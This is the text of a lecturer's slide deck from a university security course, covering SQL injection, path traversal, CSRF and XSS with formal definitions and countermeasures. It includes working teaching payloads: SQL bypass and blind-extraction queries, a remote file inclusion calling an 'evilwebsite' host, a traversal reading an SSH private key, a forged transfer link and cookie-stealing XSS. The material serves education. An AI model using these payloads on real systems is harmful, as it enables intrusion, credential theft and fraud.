4MMSR-3 web vulnerabilities-lecturer

4MMSR - Information Systems Security
3 - web vulnerabilities and attacks

Fabien Duchene1 @fabien duchene
[Lecturer version]
1 Laboratoire d’Informatique de Grenoble, VASCO team

Grenoble Institute of Technology - Grenoble INP Ensimag
ﬁrstname.name@imag.fr

2011-2012

Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 1/86 2011-2012 1 / 86

Outline

1 Injection
Introduction
Web Application: deﬁnition

2 Some web injections vulnerabilities
SQL Injection
Path Traversal
CSRF
XSS - Cross-Site scripting


Injection

Outline

1 Injection
Introduction

SQL Injection
Path Traversal
CSRF


Injection Introduction

Injection I

Intuitive Deﬁnition
exploitation of a vulnerability that permits injecting data and/or code
on the target.

[Kunz 2011]



Injection II
Threat level [OWASP 2011]
Exploitability +++ EASY
Prevalence ++ COMMON
Detectability ++ AVERAGE
Impact +++ SEVERE



Some Injection vulnerabilities

An attacker’s goal: run code he controls on the subsystem

vulnerability targeted sub- what is in- impact
system jected
Buﬀer OverFlow,
Format String
SQL Injection
XSS
Path Traversal

(Some) causes
non suﬃciently sanitized inputs
insecure use of input parameters



Some Injection vulnerabilities
An attacker’s goal: run code he controls on the subsystem
vulnerability targeted sub- what is in- impact
system jected
Buffer OverFlow, in memory exe- assembly data code execution
Format String cutable and instructions =⇒ integrity,
SQL Injection database SQL data and confidentiality,
commands availability of
XSS web application HTML / JS / data
(client browser) Java/... code
Path Traversal reading, writ- file name integrity, con-
ing, deleting fidentiality,
files availability of
files

(Some) causes
non sufficiently sanitized inputs
Fabien Duchene (LIG)
4MMSR-3-Web vulnerabilities and attacks 6/86 2011-2012 6 / 86

Injection Web Application: deﬁnition

Intuitive deﬁnition I



Intuitive deﬁnition II
Inputs
HTTP request headers: names and values:



Intuitive deﬁnition III
Outputs
HTTP Response HEADERS

HTTP Response BODY
..


Web Application:Formal definition I

[Fabien Duchene 2012]
Let Σ be an alphabet.
A transition u of a web application is a mapping from n user inputs
ilu ∈ Σ∗ : Iu = i1 , ..., in to an output q = q1 · q2 · ... · qk , q ∈ Σ∗ . Each
u u

qj is either a webserver filtered input parameter ilu - i.e.
∃fr ∈ Filters , qj = fr (ilu ) - or a string qh surrounding one or two qj .
: :

q is (in many cases) generated by GO , the output grammar (eg:
HTML)
An input sequence is I = (I1 , ..., Im ) where each Iu adheres to the
above definition.
Filters is a finite set of functions from Σ∗ → Σ∗ such as PHP
addslashes().



Web Application:Formal deﬁnition II
A web application is modeled as an Input Output Labelled Transition
System, in which each transition u conforms to the above deﬁnition.


Some web injections vulnerabilities

Outline

1 Injection
Introduction

SQL Injection
Path Traversal
CSRF


Some web injections vulnerabilities SQL Injection

SQL Injection Attack (SQli) I

code injection at the database layer of an application
subsystem: SQL database
goal: read or alter (modify or delete) data
impact:



SQL injection: schema

SQLi: a method
0. have a goal: what do you aim to do?
eg: steal and delete all customer data?
LOOP:
1.1 gain knowledge:
“how easy” can we inject?
do we have a helpful error message?
1.2 try the most interesting ones of the applicable exploitation
methods (wrt the current database knowledge)


SQli: basic - “Incorrect type handling” I

Incorrect type handling
data is not strongly typed
in the example: an integer is expected, but the language interpreter
evaluates the whole expression

1 s t a t e m e n t := ”SELECT ∗ FROM w e a t h e r d a t a WHERE s t a t i o n= ” +
a variable + ”;”

1
Example: webgoat SQLi



SQli: basic - “Incorrect type handling” II
Basic form. We submit it once and observe:

Once we submit, the station parameter seems to be used in the data
retrieval. Goal: to extract all the data from that database table



SQli: basic - “Incorrect type handling” III
Have a look at the source code, and observe the parameter name

Since it is simpler to perform request by HTTP GET, give it a try:



SQli: basic - “Incorrect type handling” IV
It works, the station parameter sent via a GET request is used by the
web application:

Let us try to inject: write a query so that it will always be evaluated
to TRUE



SQli: basic - “Incorrect type handling” V
exploitation succeeds: we are able to extract all the records from that
table



SQli: basic - “Incorrect type handling” VI
Also works if we use HTTP POST, here with Firefox Hackbar 2

Note: we only tried to get the data, but think about3
1 s t a t i o n =103 OR 1=1 ; DROP t a b l e w e a t h e r d a t a

1
[Webgoat - numeric SQL injection] Webgoat - numeric SQL injection
2
[Firefox hackbar add-on] Firefox hackbar add-on
3
Most SQL server implementations allow multiple statements. API do
generally not: PHP:mysql query() and Python:sqlite3.[.].execute() do not
support this. Some functions such as Python:sqllite3.[.].executescript() however
do


SQLi: basic - “Incorrectly ﬁltered escape characters” I

user input is not ﬁltered for escape characters (eg: ’ ” ..)
parameters are passed without using prepared statement

1 s t a t e m e n t = ”SELECT ∗ FROM u s e r s WHERE name = ’ ” + userName +
” ’; ”

How would you set the variable userName to bypass the
authentication?
A possible answer:



SQLi: basic - “Incorrectly ﬁltered escape characters” I

user input is not ﬁltered for escape characters (eg: ’ ” ..)
parameters are passed without using prepared statement

” ’; ”

How would you set the variable userName to bypass the
authentication?
A possible answer: ’ or ’trueblood’=’trueblood



SQLi: basic - “Incorrectly ﬁltered escape characters” II

” ’ ; UPDATE TABLE l o g o n a t t e m p t s SET a t t e m p t s=a t t e m p t s+1
WHERE name=’ ”+userName+” ’ ; ”

How do we prevent the logon attempt counter to increase for that
username?
A possible answer:



SQLi: basic - “Incorrectly ﬁltered escape characters” II

” ’ ; UPDATE TABLE l o g o n a t t e m p t s SET a t t e m p t s=a t t e m p t s+1
WHERE name=’ ”+userName+” ’ ; ”

How do we prevent the logon attempt counter to increase for that
username?
A possible answer:
Escape the second query thanks to SQL comments:
mario ; −−



A Formal Definition of an SQL injection I

[Wassermann 2008]
Syntactic confinement
Given a Context-Free Grammar G = (V , Σ, S, R) nonterminals V ,
terminals Σ, a start symbol S, and production rules R. Let =⇒ G denote
“derives in one step”, st. if α, β ∈ (Σ ∪ V ) and A → γ ∈ R then
αAβ =⇒ G αγβ. Let =⇒ ∗G the reflexive transitive closure of =⇒ G

Also given a string σ = σ1 σ2 σ3 ∈ Σ∗ ,
σ2 is syntactically confined in σ iff:
there exists a sentential form σ1 X σ3 s.t. X ∈ (V ∪ Σ)
and S =⇒ ∗G σ1 X σ3 =⇒ ∗G σ1 σ2 σ3 .



A Formal Definition of an SQL injection II
Sufficient condition for an SQL injection
GO , the output grammar is the SQL Grammar one. For a given e,
Ie = (i1 , i2 , ...in ), let the corresponding output be q = q1 + q2 + .. + qk .
e e e

If ∃ a qj in q s.t. qj is not syntactically confined in q then Ie is a SQL
: :

injection attack.



A Formal Deﬁnition of an SQL injection III

For input parameter 2, no production rule could generate only the tainted
output 2::::::::::
:
OR 1 = 1.



“Blind” SQLi I

Blind SQL injection?
production environment do not let you see the error outputs
when trying to inject in such a system: “blind injection”
more injection techniques on [Hackipedia - SQL injection]
4
Example: webgoat blind integer SQLIA

Assume a simple SELECT WHERE request such as:



“Blind” SQLi II

1 SELECT ‘ f i e l d n a m e ‘ from ‘ t a b l e n a m e ‘ WHERE ‘ f i e l d 1 ‘= ’ a r g 1 ’

If we try a random number:

If we try to input a non integer:

generic error message (no “straightforward” information disclosure)



“Blind” SQLi III
Is the application sensible to blind injection?

Yes!
Does such a record exist?
101 AND (SELECT COUNT(*) FROM pins WHERE
cc number=1111222233334444)>=1



“Blind” SQLi IV
Now let us explore the possible space via dichotomy
101 AND (SELECT pin FROM pins WHERE
cc number=1111222233334444)<POWER(2,31)

... POWER(2,30)
... POWER(2,11): the ﬁrst one (descending order) for which the
condition is evaluated to false



“Blind” SQLi V
Thus the value is between 211 = 2048 and 212 = 4096 (stricly)
Now let us continue the dichotomy:

Still too high...

Now too low ...

We iterate that process, and ﬁnally:



“Blind” SQLi VI

1 101 AND (SELECT p i n FROM p i n s WHERE c c n u m b e r
=1111222233334444) <(POWER( 2 , 1 1 )+POWER( 2 , 8 )+POWER( 2 , 5 )+
POWER( 2 , 4 )+POWER( 2 , 3 )+POWER( 2 , 2 )+POWER( 2 , 0 ) )

211 + 28 + 25 + 24 + 23 + 22 + 20 = 2365

Let us verify one last time that the value is 2364



“Blind” SQLi VII
5

Blind string SQL Injection Attack
Similar: character per character discovery
by using the CHAR(x) (x: integer ; ex in ASCII encoding:
CHAR(41)=’A’ ; CHAR(61)=’a’)
ASCII(c) (c: character ; eg: ASCII(’a’)=61)
and SUBSTRING(str,start,length) SQL functions
Encoding-dependent: ASCII, UTF8, UTF16 ...
Heuristic: would promote characters of the assumed alphabet

4
[Webgoat - numeric SQL injection] Webgoat - numeric SQL injection
5
[Mavituna - SQL injection sheet 2007] Mavituna - SQL injection sheet


SQLi blind string injection: exercise

we want to find the first character of the field user name of the table
users of the record with user id equal to 6969 ... thanks to the
following SQL request: (and we are able to manipulate $bet id)
we know that bet id = 3679 is a valid ID

1 ’ SELECT MAX( ‘ bet amount ‘ ) FROM ‘ b e t s ‘ WHERE ‘ b e t i d ‘= ’ +
$bet id + ’ ; ’

A possible answer:



SQLi blind string injection: exercise

we want to find the first character of the field user name of the table
users of the record with user id equal to 6969 ... thanks to the
following SQL request: (and we are able to manipulate $bet id)
we know that bet id = 3679 is a valid ID

1 ’ SELECT MAX( ‘ bet amount ‘ ) FROM ‘ b e t s ‘ WHERE ‘ b e t i d ‘= ’ +
$bet id + ’ ; ’

A possible answer: Initialization:
3679’ AND (ASCII(SELECT SUBSTRING(user name,0,1) WHERE
user id=6969) > ((ASCII(’z’)-ASCII(’A’))/2) ; –



SQLi Prevention I

input sanitization
only allow some characters
.. or explicitly deny some that have a meaning 6

strongly type the parameters
Use parameterized statements
Java
1 j a v a . s q l . PreparedStatement prep = connection . prepareStatement
(
”SELECT ∗ FROM u s e r s WHERE LASTNAME = ? AND
AGE = ? ” ) ;
3 prep . s e t S t r i n g (1 , lastname ) ;
p r e p . s e t I n t ( 2 , age ) ;
5 prep . executeQuery () ;

6
problem: might be encoding dependent (eg: UTF-8, UTF-16)


SQLi Prevention II

PHP:
1 $ p s = $db−>p r e p a r e (
’ SELECT p a s t a , f l a v o r , q u a n t i t y , o r d e r d a y ’ .
3 ’FROM o r d e r s WHERE u s e r i d =? AND o r d e r m o n t h =? ’ ) ;
$ps−>e x e c u t e ( a r r a y ( $ c u r r e n t u s e r i d , $month ) ) ;


Some web injections vulnerabilities Path Traversal

Path Traversal

Path Traversal aka “../” (dot-dot-slash) vulnerability
performing operations (read, execute, write) on ﬁles, folders that the
web application developper(s) did not conceive the application for
impact:
security properties:
“LFI” Local File Inclusion
“RFI” Remote File Inclusion



Path Traversal: schema I



Path Traversal: schema II

A method
1. Observe the inputs dependencies regarding on which ﬁle an action
is performed (and eventually which action)
2. craft those inputs to perform the desired action(s) on the desired
ﬁle(s)



Example I

<?php
2 $color = ’ blue ’ ;
i f ( i s s e t ( $ GET [ ’LANGUAGE ’ ] ) )
4 $ l a n g u a g e = $ GET [ ’LANGUAGE ’ ] ;
i n c l u d e ( $ l a n g u a g e . ’ . php ’ ) ;
6 ?>

8 <form method=” g e t ”>
< s e l e c t name=”LANGUAGE”>
10 <o p t i o n v a l u e=” e n g l i s h ”>e n g l i s h </o p t i o n >
<o p t i o n v a l u e=” c h i n e s e ”>c h i n e s e </o p t i o n >
12 </ s e l e c t >
<i n p u t t y p e=” s u b m i t ”>
14 </form>

1–ﬁles/ﬁle–include.php



Path vulnerability example

How would you perform an HTTP GET request in order to
list the content of the /etc/passwd ﬁle?
LFI. A possible answer:
run code from a remote ﬁle?
RFI. A possible answer:



Path vulnerability example

How would you perform an HTTP GET request in order to
list the content of the /etc/passwd ﬁle?
LFI. A possible answer: ?LANGUAGE=/etc/passwd%00
run code from a remote ﬁle?
RFI. A possible answer:
?LANGUAGE=’http://evilwebsite.ext/evilscript.ext%00



Example II

Consider a similar PHP code, replace the include line:
...
2 i n c l u d e ( ” /home/ webapp1 / p u b l i c h t m l / c o d e / l a n g u a g e s / ” .
$language ) ;
...

How would you read the RSA SSH private key ( /.ssh/id rsa) of the
user orlando (/home/orlando) ?
Directory traversal. A possible answer:



Example II

Consider a similar PHP code, replace the include line:
1 ...
i n c l u d e ( ” /home/ webapp1 / p u b l i c h t m l / c o d e / l a n g u a g e s / ” .
$language ) ;
3 ...

How would you read the RSA SSH private key ( /.ssh/id rsa) of the
user orlando (/home/orlando) ?
Directory traversal. A possible answer: ../../../../orlando/.ssh/id rsa



Path traversal - countermeasures

(once more) input sanitization
limit file inclusion to a selected subset of directories. This can be
done at several layers:
interpreter (eg: PHP (allow url fopen allow url include), ASP.Net)
web-server (eg: Apache httpd) configuration)
chroot jails or similar systems (children processes will only be able to
open files within the defined chroot jail authorization)
enforce strict ACL on sensitive files and run websites on different
identity than the owner(s) of those sensitive files


Some web injections vulnerabilities CSRF

CSRF I

Cross Site Request Forgery: main objective
attacker tricks a victim to load.. a webpage on a legitimate
website
by loading that webpage, the victim will perform the action planned
by the attacker

Causes
web application is not able to distinguish between an automatic
action and a user-driven one



CSRF II



CSRF III
CSRF: detailed steps
1. application logic discovery: the attacker craft a precise HTTP
Request (including HTTP Headers, GET and/or POST parameters
and values) that if run by another user will perform the actions the
attacker desires
2. the victim has ﬁrst to be authenticated
3. a malicious message is sent, for the request automatically to be
performed when the user reads it (eg: HTML via IM, twitter, email...)
4. the victim runs that code inside its browser, and actions are
performed without him noticing it



CSRF example I

Aimelyne wants to trick Ilyas to receive 2000 USD from him via the
website payme.wtf
Application logic discovery
A uses the payme.wtf for a small amount 5 USD to Melissa
... and discovers that the following request is performed:

1 GET h t t p : / / payme . w t f / t r a n s f e r . do ? t o=M e l i s s a&amount=5 HTTP/ 1 . 1



CSRF example II

Malicious link construction
How would A construct a malicious link so that people who will perform
that request would (if authenticated) send here 2000 USD?



CSRF example II

Malicious link construction
How would A construct a malicious link so that people who will perform
that request would (if authenticated) send here 2000 USD?
http://payme.wtf/transfer.do?to=Aimleyne&amount=2000



CSRF example III

Transmission to the victim
How would A send that link to the victim?
A possible answer:

The victim gets tricked
Assuming Ilyas is authenticated, if he clicks the link, Aimelyne will receive
the money.
What is the problem that now could occur?
Answer:
How to prevent that?
A solution:
7
7
We here assumed a GET request. POST request could also be tricked (eg:
HTML form, input submission triggered via javascript)


CSRF example III
Transmission to the victim
How would A send that link to the victim?
A possible answer: email, instant messaging (eg: skype, gchat...)

The victim gets tricked
Assuming Ilyas is authenticated, if he clicks the link, Aimelyne will receive
the money.
What is the problem that now could occur?
Answer: Ilyas could notice that he just performed an action
How to prevent that?
A solution: force the HTTP GET request to be performed so that the
user does not notice it. eg: very small iframe, img, script, css, ﬂash ...
basically anything a browser can load!
7
7
We here assumed a GET request. POST request could also be tricked (eg:
HTML form, input submission triggeredvulnerabilities and attacks
Fabien Duchene (LIG) 4MMSR-3-Web via javascript) 48/86 2011-2012 48 / 86


CSRF countermeasures
client side:
Let the user to decide to perform a cross-site request [RequestPolicy
firefox add-on], [CsFire firefox add-on]
prevention redirections [Ryck et al. 2011]
server side:
for each form request, include a “fresh state token” (unaccepted
request if replay attack)
freshness requires a sufficient randomization
eg. dependencies: user identity, session, time, webpage from which the
request come from, form “status”
ASP.Net: viewstate
Java: Nothing out of the box, but ability to build it. OWASP
CSRFGuard
checking the HTTP header referer from which webpage does the
request come from? is it the very same website or at least one that I
do trust?
limiting the lifetime of tickets (eg: cookies)

Some web injections vulnerabilities XSS - Cross-Site scripting

X whaaat? I

XSS (aka Cross Site Scripting) is a code injection vulnerability within
web applications. Exploiting it allows an attacker to inject code (eg:
html, javascript, ﬂash...) and to run it in the visitor context (victim’s
browser) in order to bypass access control mechanisms (eg:
Same-Origin Policy)
“Cross-site”: code from another source is run onto the attacked
website.
12,885 XSS vulnerabilities reported in 2008 8

XSS starts with a X because... not to be counfonded with CSS
XSS ...
are executed on the client
targets client side
data eg: session cookies
control



X whaaat? II
How attackers do have fun?
silently install a malware in your browser
steal your session credentials (eg: cookies)
use your browser as part of a botnet
http only: http://fd.the-wildcat.de/apache e36a9cf46c.php

Same origin policy
security boundary based on the very same (fqdn, port, and protocol)
only the very same “entity” can access for instance user credentials
eg:
https://ocarina.imag.fr/page1.py
http://ocarina.imag.fr/page3.html
http://ocarina.imag.fr:82/page5.php



X whaaat? III
Causes
HTML mix content, control statements and formatting
cross site requests allowed by default

8
[Symantec 2009] Symantec Global Internet Security Threat Report - trends
for 2008


Where can it be found? I

any website processing arguments (HTTP GET, POST ...)
mail.google.com [Amit 2010] Cross-Site Scripting through Flash in
Gmail Based Services



Where can it be found? II
m.facebook.com [CrazyDaVinci 2011] Autopost Spamming using
Facebook Mobile XSS



XSS classiﬁcation

According to the minimal number of executed transitions (a couple of
SUT request + answer)
type 0 XSS
type 1 XSS / reﬂected / non-persistent:
type 2 XSS / stored / persistent:



Reﬂected XSS / type 1 attack

9

9
[IBM 2002] Cross-site scripting



Reﬂected XSS
aka non-persistent / type 1
“easy” to trigger
the most found in terms of number of vulnerabilities
diﬀerent from CSRF! why?




Reﬂected XSS
aka non-persistent / type 1
“easy” to trigger
the most found in terms of number of vulnerabilities
diﬀerent from CSRF! why? .. code execution on the client side!



Reﬂected XSS - example I

web application: online shop



Reﬂected XSS - example II
after submitting the form



Reﬂected XSS - example III
observe the HTTP Request parameters:

What are their names and their assumed types?



Reflected XSS - example III I

attempt to inject in QTY1:

1 QTY1=1a<img s r c=m a r i o . g i f o n e r r o r= a l e r t ( 1 )>

try to inject another field. eg: field1



Reﬂected XSS - example III II

1 QTY1=1a<img s r c=m a r i o . g i f o n e r r o r= a l e r t ( 1 )>&QTY2=1&QTY3=1&
QTY4=1& f i e l d 2 =4128+3214+0002+1999& f i e l d 1 =111<img s r c=m a r i o
. g i f o n e r r o r= a l e r t ( document . c o o k i e )>&SUBMIT=P u r c h a s e

success! we are able to inject some code! here, we showed that we
can steal the victim cookies

we can transfer the crafted URL to the victim via: twitter, IM, email
... (even shorten it eg: bit.ly )



Type 1 - XSS a formal deﬁnition I

[Fabien Duchene 2012]
Let q be the following extract of the SUT output:
1 <a name=” [ USER INFLUENCED INPUT ] ”>Hola !</a>

q = q1 + q2 + q3
::

GO : HTML grammar (actually depends WHERE we can inject: JS, Flash..)



Type 1 - XSS a formal deﬁnition II
Extract of the Parse Tree TG0 of the SUT output
<a
name
A ATTR NAME =
":::::::
kalimu"
A LEFT A ATTR
onclick
:::::::
A ATTR ONC =
::
"alert(1)"
:::::::::
>



Stored XSS / type 2 attack I

10

10
[IBM 2002] Cross-site scripting


Stored XSS

interesting for browser worms
impact more important (eg: Facebook wall)
in brief: data stored on the server and displayed with only the
victim interaction



Stored XSS - example I

[WebGoat - the vulnerable web application] WebGoat - the vulnerable
web application



Stored XSS - example II
Login form



Stored XSS - example III
Proﬁle visualization



Stored XSS example

Proﬁle edition

Any idea?



Stored XSS example I

Now let us logon as Jerry



Stored XSS example II
And check Tom’s proﬁle:



Stored XSS example III
P0wN3d!



DOM based XSS / type 0 attack I

The web-server does not receive the payload anymore



DOM based XSS / type 0 attack II
DOM XSS steps
1. searching for a valid URL on the website
2. searching for ways to run code within the browser from an
URL load request without sending it to the server
3. sending to the victim for the malicious URL
4. the browser loads the legitimate webpage
5. and runs the payload (without something noticeable on the
server side)



DOM based XSS / type 0 attack III
Causes
[Paola 2011]
sources: input data controlled directly
or not by the attacker
sinks: potentially dangerous functions
ﬁlters: operations on sources which
change the content

badly designed client ﬁlters
focus on server side XSS detection, while this is a client problem



Document Object Model
DOM? a tree permitting accessing in a programmatic way objects
that are represented on a rendered webpage 11

11
[Document Object Model] Document Object Model


DOM XSS example I

Classic example from the original DOM-XSS paper [Klein 2005] “DOM
Based Cross Site Scripting or XSS of the Third Kind”
http://www.vulnerable.site/welcome.html
1 <HTML >
<TITLE>Welcome!</TITLE>
3 Hi
<SCRIPT>
5 v a r p o s=document . URL . i n d e x O f ( ”name=” ) +5;
document . w r i t e ( document . URL . s u b s t r i n g ( pos , document . URL . l e n g t h
));
7 </SCRIPT>
<BR>
9 Welcome t o o u r s y s t e m
...
11 </HTML >



DOM XSS example II
normal usage:
http://www.vulnerable.site/welcome.html?name=Sophie
malicious crafted link:

1 h t t p : / /www . v u l n e r a b l e . s i t e / welcome . h t ml ?name=S o p h i e#b l a b l a <
s c r i p t > a l e r t ( document . c o o k i e ) ; </ s c r i p t >

... there are a lot of trickier stuﬀ!



XSS counter-measures I

Input sanitization
client size: letting the user decide to run anything else than HTML
eg: [NoScript]
server side:
“proxy/stub” between the http server and the clients
filtering:
only allow a subset of characters

input and output filtering [HTMLPurifier], [AntiSamy project]...



XSS counter-measures II
both: httpOnly [httponly] (on most modern browsers, not possible
with document.cookie and XMLHTTPResponse, but still vulnerable if
using XMLHTTPRequest)

Stored
oﬄine search in databases: fastidious (encoding, patterns), response
time?

DOM
Frozen-DOM [0x6D6172696F 2011]
X-Content-SecurityPolicy [Paola 2011]


Appendix For Further Reading

0x6D6172696F, Mario Heiderich (2011).
Locking the Throne Room - ECMA Script 5, a frozen DOM and the eradicati
http://www.hackinparis.com/slides/hip2k11/0
2-LockingTheThroneRoom.pdf http://mario.heideri.ch.
Amit, Yair (2010).
Cross-Site Scripting through Flash in Gmail Based Services.
http://blog.watchfire.com/wfblog/2010/03/cross-site-scripti
ng-through-flash-in-gmail-based-services.html.
CrazyDaVinci (2011). Autopost Spamming using Facebook Mobile XSS.
http://crazydavinci.net/2011/0
3/autopost-spamming-using-facebook-mobile-xss/.
Fabien Duchene Roland Groz, Sanjay Rawat Jean-Luc Richier (2012).
XSS Vulnerability Detection Using Model Inference Assisted Evolutionary Fuz
Hackipedia - SQL injection.
http://hakipedia.com/index.php/SQL_Injection.
Heiderich, Mario. HTML5 security. http://html5sec.org/.



IBM, Paul Lee (2002). Cross-site scripting. https:
//www.ibm.com/developerworks/tivoli/library/s-csscript/.
Johan Adriaans, Pedro Laguna. Firefox hackbar add-on.
https://addons.mozilla.org/en-US/firefox/addon/hackbar/.
Klein, Amit (2005). “DOM Based Cross Site Scripting or XSS of the Third
Kind”. In:
http://www.webappsec.org/projects/articles/071105.shtml.
Kunz, Benjamin (2011).
Skype Vulnerabilities: Zero Day Exploitation 2011, HITBSecConf 2011 (Mala
http://conference.hitb.org/hitbsecconf2011kul/?page_id=1757.
Maone, Giorgio. NoScript.
https://addons.mozilla.org/en-US/firefox/addon/noscript/.
Mavituna - SQL injection sheet (2007).
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/.
OWASP. AntiSamy project. https:
//www.owasp.org/index.php/Category:OWASP_AntiSamy_Project.
— httponly. https://www.owasp.org/index.php/HTTPOnly.



OWASP. WebGoat - the vulnerable web application. https:
//www.owasp.org/index.php/Category:OWASP_WebGoat_Project.
— (2011). Injection - OWASP top 10 - 2010.
https://www.owasp.org/index.php/Top_10_2010-A1.
Paola, Stefano Di (2011). DOM Xss Identification and Exploitation.
http://media.hacking-lab.com/scs3/scs3_pdf/SCS3_201
1_Di_Paola.pdf.
Philippe De Ryck, Lieven Desmet. CsFire firefox add-on.
https://addons.mozilla.org/en-US/firefox/addon/csfire/.
RSnake. XSS. http://ha.ckers.org/xss.html.
Ryck, Philippe De et al. (2011). “Automatic and Precise Client-Side
Protection against CSRF Attacks”. In: https:
//lirias.kuleuven.be/bitstream/123456789/311551/1/paper.pdf.
ESORICS.
Samuel, Justin. RequestPolicy firefox add-on. https:
//addons.mozilla.org/en-US/firefox/addon/requestpolicy/.



Symantec (2009).
Symantec Global Internet Security Threat Report - trends for 2008.
http://eval.symantec.com/mktginfo/enterprise/white_papers/
b-whitepaper_internet_security_threat_report_xiv_04-200
9.en-us.pdf.
Wassermann, Gary Michael (2008).
Techniques and Tools for Engineering Secure Web Applications. Ph.D.
thesis.
Webgoat - numeric SQL injection.
http://yehg.net/lab/pr0js/training/view/owasp/webgoat/Web
Goat_InjectionFlaws_NumericSQLInject/WebGoat_Injection
Flaws_NumericSQLInject.html.
Wikipedia. Document Object Model.
https://secure.wikimedia.org/wikipedia/en/wiki/Document_
Object_Model.
Yang, Edward Z. HTMLPuriﬁer. http://htmlpurifier.org/.


Bonus slides XSS

Also see
Some tricks to escape browser protections [XSS]
[HTML5 security]


4MMSR-3 web vulnerabilities-lecturer

Recomendados

Recomendados

Mais conteúdo relacionado

Mais procurados

Mais procurados (20)

Semelhante a 4MMSR-3 web vulnerabilities-lecturer

Semelhante a 4MMSR-3 web vulnerabilities-lecturer (20)

Último

Último (20)

4MMSR-3 web vulnerabilities-lecturer